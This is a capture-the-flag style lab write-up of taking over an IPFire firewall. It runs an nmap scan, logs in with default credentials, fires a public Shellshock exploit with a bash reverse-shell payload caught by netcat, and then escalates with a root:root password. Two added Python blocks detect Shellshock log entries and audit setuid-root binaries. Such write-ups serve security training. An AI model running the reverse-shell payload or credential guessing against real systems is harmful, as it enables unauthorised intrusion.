VHL — FW01

IPFire firewall appliance with DNSmasq on port 53. Default/weak credentials on the admin panel lead to command execution.

Misc · Medium · Linux
February 16, 2025 · Virtual Hacking Labs
Tags: #IPFire #Firewall #DNSmasq #Default Creds
nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.200
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 14:53 EST
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.79% done; ETC: 14:55 (0:00:25 remaining)
Nmap scan report for 10.11.1.200
Host is up (0.022s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.71
| dns-nsid:
|_ bind.version: dnsmasq-2.71
81/tcp open http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 401 Authorization Required
|_Requested resource was /cgi-bin/index.cgi
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=IPFire - Restricted
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27
444/tcp open ssl/http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 400 Bad Request
|_Requested resource was /cgi-bin/index.cgi
| ssl-cert: Subject: commonName=fw01.localdomain
| Not valid before: 2016-12-07T15:50:11
|_Not valid after: 2032-10-18T06:24:51
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall
Running (JUST GUESSING): Linux 3.X|2.6.X|4.X (97%), WatchGuard Fireware 11.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:4 cpe:/o:watchguard:fireware:11.8
Aggressive OS guesses: Linux 3.2 - 3.8 (97%), Linux 2.6.32 - 3.0 (92%), Linux 2.6.32 (91%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 2.6.32 - 3.10 (90%), Linux 2.6.32 - 3.13 (90%), Linux 3.11 - 4.1 (90%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
TRACEROUTE
HOP RTT ADDRESS
1 22.45 ms 10.11.1.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.02 seconds
```
81

```sh
81/tcp open http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 401 Authorization Required
|_Requested resource was /cgi-bin/index.cgi
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=IPFire - Restricted
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27
```

default credentials

admin:admin (logging in redirects to https)

IPFire-2.15-Shellshock-Exploit
- https://github.com/heartburn-dev/IPFire-2.15-Shellshock-Exploit

```sh
python3 SIPS.py 10.11.1.200 444 /cgi-bin/index.cgi admin admin 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1'
[*] [S]kunk's [IP]Fire [S]hellshock - By 0xSkunk
[*] For use with Python3 - Effective against IPFire <= 2.15 Core Update 82
[*] Example Usage: python3 SIPS.py 69.69.13.37 444 /cgi-bin/index.cgi admin p@ssw0rd 'bash -i >& /dev/tcp/12.34.56.78/4444 0>&1'
[*] Valid IP Address...
[*] Port is an integer...
[*] Directory correctly prefixed with /...
[*] Is the target using (1) HTTP or (2) HTTPS: 2
2
[*] Attempting to deliver payload: bash -i >& /dev/tcp/172.16.1.1/1234 0>&1
```

```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.200] 38946
bash: no job control in this shell
bash-3.2$ whoami
whoami
nobody
```
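Added here as a defender-side example, not part of the original writeup or of the SIPS tool: a small parser over constructed Apache combined-format log lines that flags Shellshock-style function definitions in the User-Agent of requests to the IPFire CGI and counts 401 responses per source, the two traces this chain leaves behind (credential guessing against /cgi-bin/index.cgi, then the Shellshock payload delivered behind the guessed login). The log format, sample lines, source IPs and function names are assumptions.

```python
import re
from collections import Counter

# Constructed Apache combined-format lines modelled on the writeup's target
# (Basic-auth protected /cgi-bin/index.cgi); not real captured traffic.
SAMPLE_LOG = """\
10.11.1.50 - - [16/Feb/2025:14:53:01 -0500] "GET /cgi-bin/index.cgi HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.11.1.50 - - [16/Feb/2025:14:53:02 -0500] "GET /cgi-bin/index.cgi HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.11.1.50 - admin [16/Feb/2025:14:55:10 -0500] "GET /cgi-bin/index.cgi HTTP/1.1" 200 5123 "-" "() { :;}; /bin/bash -c 'id'"
10.11.1.51 - - [16/Feb/2025:14:55:12 -0500] "GET /cgi-bin/index.cgi HTTP/1.1" 401 381 "-" "() { :; }; echo probe"
10.11.1.52 - - [16/Feb/2025:14:56:00 -0500] "GET /cgi-bin/index.cgi HTTP/1.1" 200 5123 "-" "curl/7.88"
"""

# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Shellshock trigger: an exported bash function body "() { ... };" followed by a command.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

def parse_line(line):
    """Split one log line into named fields; None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(log_text, path="/cgi-bin/index.cgi"):
    """(ip, user, status, ua) for each request to `path` whose User-Agent
    carries a Shellshock function definition. A 200 with a Basic-auth user
    means the payload reached the CGI behind valid credentials."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and path in rec["req"] and SHELLSHOCK_RE.search(rec["ua"]):
            hits.append((rec["ip"], rec["user"], int(rec["status"]), rec["ua"]))
    return hits

def auth_failures_by_ip(log_text, path="/cgi-bin/index.cgi"):
    """401 count per source IP for `path`: repeated failures from one source
    are the footprint of default/weak credential guessing."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == "401" and path in rec["req"]:
            counts[rec["ip"]] += 1
    return dict(counts)

if __name__ == "__main__":
    print(find_shellshock(SAMPLE_LOG), auth_failures_by_ip(SAMPLE_LOG))
```

The pattern only looks at the User-Agent because that is the header the SIPS tool and most Shellshock scanners use; Referer and Cookie are also passed to CGI as environment variables, so a production rule should check those fields too.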
```sh
python -c 'import pty; pty.spawn("/bin/bash")'
```

priv esc

```sh
bash-3.2$ uname -a
uname -a
Linux fw01 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 pentium2 i386 GNU/Linux
bash-3.2$ cat /etc/os-release
```

```sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-x--- 1 root nobody 8.7K Sep 9 2014 /usr/local/bin/rebuildroutes (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 10K Sep 9 2014 /usr/local/bin/logwatch (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/dhcpctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.8K Sep 9 2014 /usr/local/bin/getconntracktable (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/launch-ether-wake (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 16K Sep 9 2014 /usr/local/bin/wirelessctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.7K Sep 9 2014 /usr/local/bin/firewallctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/setaliases (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 6.8K Sep 9 2014 /usr/local/bin/urlfilterctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.2K Sep 9 2014 /usr/local/bin/backupctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.9K Sep 9 2014 /usr/local/bin/dnsmasqctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/snortctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 6.8K Sep 9 2014 /usr/local/bin/updxlratorctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/upnpctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 11K Sep 9 2014 /usr/local/bin/addonctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/redctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.0K Sep 9 2014 /usr/local/bin/pakfire (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 29K Sep 9 2014 /usr/local/bin/openvpnctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/timectrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/smartctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 15K Sep 9 2014 /usr/local/bin/ipsecctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/rebuildhosts (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.0K Sep 9 2014 /usr/local/bin/getipstat (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/sshctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.9K Sep 9 2014 /usr/local/bin/extrahdctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/syslogdctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/qosctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/squidctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 7.5K Sep 9 2014 /usr/local/bin/ipfirereboot (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.8K Sep 9 2014 /usr/local/bin/wirelessclient (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.6K Sep 9 2014 /usr/local/bin/fireinfoctrl (Unknown SUID binary!)
-rws--x--x 1 root root 550K Sep 9 2014 /usr/lib/openssh/ssh-keysign
-r-sr-x--- 1 root root 24K Sep 9 2014 /usr/lib/pppd/2.4.7/rp-pppoe.so (Unknown SUID binary!)
-r-sr-x--- 1 root root 20K Sep 9 2014 /usr/lib/pppd/2.4.7/pppoatm.so (Unknown SUID binary!)
-rwsr-xr-x 1 root root 375K Sep 9 2014 /usr/bin/screen-4.0.3 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 166K Sep 9 2014 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 1.1M Sep 9 2014 /usr/bin/gpg
-rwsr-xr-x 1 root root 28K Sep 9 2014 /usr/bin/fusermount
-rwsr-x--- 1 root nobody 103K Sep 9 2014 /usr/bin/lsof (Unknown SUID binary!)
-rwsr-xr-x 1 root root 36K Sep 9 2014 /usr/bin/ping
-rwsr-xr-x 1 root root 33K Sep 9 2014 /lib/security/unix_chkpwd
-rwsr-xr-x 1 root root 29K Sep 9 2014 /bin/su
-rwsr-xr-x 1 root root 23K Sep 9 2014 /bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 23K Sep 9 2014 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 34K Sep 9 2014 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 23K Sep 9 2014 /usr/bin/wall
---x--s--x 1 cron cron 59K Sep 9 2014 /usr/bin/fcrontab (Unknown SGID binary)
```
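The listing above shows the design detail that makes a shell as nobody on IPFire worth worrying about: dozens of setuid-root helpers in /usr/local/bin are group-executable by nobody, the account the CGI runs as. Added here as a hardening check (not part of the writeup or of linpeas): a parser over constructed ls -l style lines that reports setuid-root files outside an assumed baseline which a given set of groups, or everyone, can execute. The sample lines, the BASELINE set and the function names are assumptions.

```python
import re

# Constructed ls -l style lines modelled on the writeup's SUID listing (same
# modes and owners, trimmed); a trailing annotation is tolerated, not required.
SAMPLE_LISTING = """\
-rwsr-x--- 1 root nobody 8.7K Sep 9 2014 /usr/local/bin/rebuildroutes (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 29K Sep 9 2014 /usr/local/bin/openvpnctrl
-rwsr-xr-x 1 root root 166K Sep 9 2014 /usr/bin/sudo
-rwsr-xr-x 1 root root 23K Sep 9 2014 /bin/passwd
-rwxr-xr-x 1 root root 12K Sep 9 2014 /usr/bin/id
-rws--x--x 1 root root 550K Sep 9 2014 /usr/lib/openssh/ssh-keysign
-rwsr-x--- 1 root nobody 103K Sep 9 2014 /usr/bin/lsof
"""

LS_RE = re.compile(
    r'^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+'
    r'\S+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)'
)
# Stock setuid-root binaries expected on most Linux hosts (assumed baseline).
BASELINE = {"/bin/su", "/bin/passwd", "/bin/mount", "/bin/umount", "/usr/bin/sudo", "/usr/bin/ping"}

def parse_ls_line(line):
    """Return (mode, owner, group, path) or None for lines that are not ls -l output."""
    m = LS_RE.match(line)
    return (m["mode"], m["owner"], m["group"], m["path"]) if m else None

def audit_suid(listing, account_groups=("nobody",)):
    """Setuid-root files outside BASELINE that a member of `account_groups`
    (or anyone) can execute, with the reason. On IPFire the CGI runs as nobody,
    so each /usr/local/bin/*ctrl helper that is group-executable by nobody is a
    root-privileged entry point for any code execution inside the web UI."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if not parsed:
            continue
        mode, owner, group, path = parsed
        if mode[3] not in "sS" or owner != "root" or path in BASELINE:
            continue
        if group in account_groups and mode[6] in "xs":
            findings.append((path, f"group {group} may execute"))
        elif mode[9] in "xt":
            findings.append((path, "world-executable"))
    return findings

if __name__ == "__main__":
    for path, why in audit_suid(SAMPLE_LISTING):
        print(f"{path}: setuid root, {why}")
```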
```sh
╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x 3 root root 4096 Sep 9 2014 .
drwxr-xr-x 21 root root 4096 Dec 7 2016 ..
drwxr-xr-x 6 root root 4096 Sep 9 2014 pakfire
╔══════════╣ Unexpected in root
/.rnd
```

weak root credential

root:root

```sh
bash-3.2$ su root
su root
Password: root
[root@fw01 /]# whoami
whoami
root
[root@fw01 /]# cat /root/key.txt
cat /root/key.txt
z2pap8s3f7jqeg59cb6f
```